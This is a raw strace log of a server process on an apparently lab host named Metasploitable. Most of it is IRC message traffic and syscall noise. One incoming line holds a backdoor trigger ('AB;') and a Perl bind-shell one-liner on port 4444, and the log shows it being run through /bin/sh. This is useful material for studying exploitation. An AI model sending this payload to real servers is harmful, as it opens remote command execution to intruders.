4519  20:22:37.095559 select(1024, [2 3 4 7 9], [], NULL, {0, 980000}) = 1 (in [4], left {0, 350000})
4519  20:22:37.725843 clock_gettime(CLOCK_MONOTONIC, {48567, 542852560}) = 0
4519  20:22:37.725844 recv(4, "PRIVMSG  #testit0 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55
4519  20:22:37.725844 send(4, ":irc.Metasploitable.LAN 421 bla0 CPRIVMSG :Unknown command\r\n", 60, 0) = 60
4519  20:22:37.725844 gettimeofday({1495671757, 725844}, NULL) = 0
4519  20:22:37.725844 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 850000})
4519  20:22:37.875751 clock_gettime(CLOCK_MONOTONIC, {48567, 692760386}) = 0
4519  20:22:37.875751 recv(9, "PRIVMSG  #testit2 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59
4519  20:22:37.875752 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875752 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875752 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875752 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875753 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875753 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875753 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875753 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875753 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875767 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875781 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875795 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875809 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875823 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875836 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875861 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875876 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875890 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875903 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875917 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875931 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875945 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.875960 time(NULL)        = 1495671757
4519  20:22:37.875970 time(NULL)        = 1495671757
4519  20:22:37.875982 gettimeofday({1495671757, 875986}, NULL) = 0
4519  20:22:37.875994 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:22:37.876023 clock_gettime(CLOCK_MONOTONIC, {48567, 693035653}) = 0
4519  20:22:37.876033 gettimeofday({1495671757, 876037}, NULL) = 0
4519  20:22:37.876044 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 930000})
4519  20:22:37.945547 clock_gettime(CLOCK_MONOTONIC, {48567, 762566235}) = 0
4519  20:22:37.945567 recv(4, "PRIVMSG  #testit0 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59
4519  20:22:37.945590 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945606 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945620 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945634 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945648 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945671 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945684 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945698 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945711 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945725 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945738 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945751 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945764 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945778 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945791 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945804 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945817 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945830 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945844 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945858 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945871 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945884 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:37.945930 gettimeofday({1495671757, 945935}, NULL) = 0
4519  20:22:37.945944 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 840000})
4519  20:22:38.105549 clock_gettime(CLOCK_MONOTONIC, {48567, 922560790}) = 0
4519  20:22:38.105563 recv(9, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45
4519  20:22:38.105587 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105604 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105619 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105634 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105647 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105661 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105675 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105689 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105702 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105716 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105730 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105744 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105757 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105771 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105784 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105798 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105812 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105825 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105839 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105853 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105867 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105888 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.105904 time(NULL)        = 1495671758
4519  20:22:38.105914 time(NULL)        = 1495671758
4519  20:22:38.105926 gettimeofday({1495671758, 105941}, NULL) = 0
4519  20:22:38.105950 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:22:38.105980 clock_gettime(CLOCK_MONOTONIC, {48567, 922992734}) = 0
4519  20:22:38.105990 gettimeofday({1495671758, 105994}, NULL) = 0
4519  20:22:38.106001 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 900000})
4519  20:22:38.205575 clock_gettime(CLOCK_MONOTONIC, {48568, 22595594}) = 0
4519  20:22:38.205597 recv(9, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71
4519  20:22:38.205623 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205641 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205656 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205670 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205684 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205698 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205712 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205726 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205739 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205753 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205767 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205780 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205794 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205808 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205821 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205835 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205848 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205862 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205876 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205890 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205904 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205918 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:22:38.205935 gettimeofday({1495671758, 205938}, NULL) = 0
4519  20:22:38.205975 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 920000})
4519  20:22:38.286110 clock_gettime(CLOCK_MONOTONIC, {48568, 103129923}) = 0
4519  20:22:38.286130 time(NULL)        = 1495671758
4519  20:22:38.286139 time(NULL)        = 1495671758
4519  20:22:38.286151 gettimeofday({1495671758, 286155}, NULL) = 0
4519  20:22:38.286162 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})
4519  20:22:38.286201 clock_gettime(CLOCK_MONOTONIC, {48568, 103213751}) = 0
4519  20:22:38.286211 gettimeofday({1495671758, 286214}, NULL) = 0
4519  20:22:38.286221 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})
4519  20:22:38.286259 clock_gettime(CLOCK_MONOTONIC, {48568, 103271955}) = 0
4519  20:22:38.286271 accept(2, 0, NULL) = 5
4519  20:22:38.286289 getpeername(5, {sa_family=AF_INET, sin_port=htons(35061), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:22:38.286319 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:22:38.286332 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:22:38.286352 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:22:38.286364 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:22:38.286375 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:22:38.286386 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:22:38.286398 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:22:38.286414 clock_gettime(CLOCK_MONOTONIC, {48568, 103427867}) = 0
4519  20:22:38.286426 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:22:38.286438 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:22:38.286448 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:22:38.286457 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:22:38.286467 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:22:38.286651 send(6, "\370\360\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:22:38.286700 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:22:38.286759 gettimeofday({1495671758, 286763}, NULL) = 0
4519  20:22:38.286784 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})
4519  20:22:38.289285 clock_gettime(CLOCK_MONOTONIC, {48568, 106321034}) = 0
4519  20:22:38.289321 recvfrom(6, "\370\360\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\17\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:22:38.289375 close(6)          = 0
4519  20:22:38.289389 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:22:38.289403 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174
4519  20:22:38.289458 time(NULL)        = 1495671758
4519  20:22:38.289468 time(NULL)        = 1495671758
4519  20:22:38.289478 gettimeofday({1495671758, 289501}, NULL) = 0
4519  20:22:38.289509 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:22:38.289561 clock_gettime(CLOCK_MONOTONIC, {48568, 106574590}) = 0
4519  20:22:38.289572 gettimeofday({1495671758, 289575}, NULL) = 0
4519  20:22:38.289582 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 980000})
4519  20:22:38.306465 clock_gettime(CLOCK_MONOTONIC, {48568, 123508510}) = 0
4519  20:22:38.306545 recv(9, "USERIP bla4\n", 8192, 0) = 12
4519  20:22:38.306594 send(9, ":irc.Metasploitable.LAN 340 bla4 :bla4=-bla4@127.0.0.1    \r\n", 60, 0) = 60
4519  20:22:38.306633 gettimeofday({1495671758, 306641}, NULL) = 0
4519  20:22:38.306657 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})
4519  20:22:38.306700 clock_gettime(CLOCK_MONOTONIC, {48568, 123713000}) = 0
4519  20:22:38.306712 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:22:38.306742 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:22:38.306764 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:22:38.306776 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:22:38.306791 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12014
12014 20:22:38.306865 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
12014 20:22:38.306880 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
12014 20:22:38.306902 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12014 20:22:38.306918 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
12014 20:22:38.307035 brk(0)            = 0x80f9000
12014 20:22:38.307058 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.307075 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eea000
12014 20:22:38.307092 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.307110 open("/etc/ld.so.cache", O_RDONLY) = 1
12014 20:22:38.307123 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12014 20:22:38.307142 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee2000
12014 20:22:38.307152 close(1)          = 0
12014 20:22:38.307163 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.307178 open("/lib/libncurses.so.5", O_RDONLY) = 1
12014 20:22:38.307192 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
12014 20:22:38.307287 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
12014 20:22:38.307305 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eb2000
12014 20:22:38.307318 mmap2(0xb7edf000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7edf000
12014 20:22:38.307335 close(1)          = 0
12014 20:22:38.307347 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.307361 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
12014 20:22:38.307376 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
12014 20:22:38.307479 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
12014 20:22:38.307499 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eae000
12014 20:22:38.307511 mmap2(0xb7eb0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7eb0000
12014 20:22:38.307527 close(1)          = 0
12014 20:22:38.307539 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.307557 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
12014 20:22:38.307572 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
12014 20:22:38.307662 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
12014 20:22:38.307678 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ead000
12014 20:22:38.307692 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5e000
12014 20:22:38.307703 mmap2(0xb7ea7000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ea7000
12014 20:22:38.307719 mmap2(0xb7eaa000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eaa000
12014 20:22:38.307733 close(1)          = 0
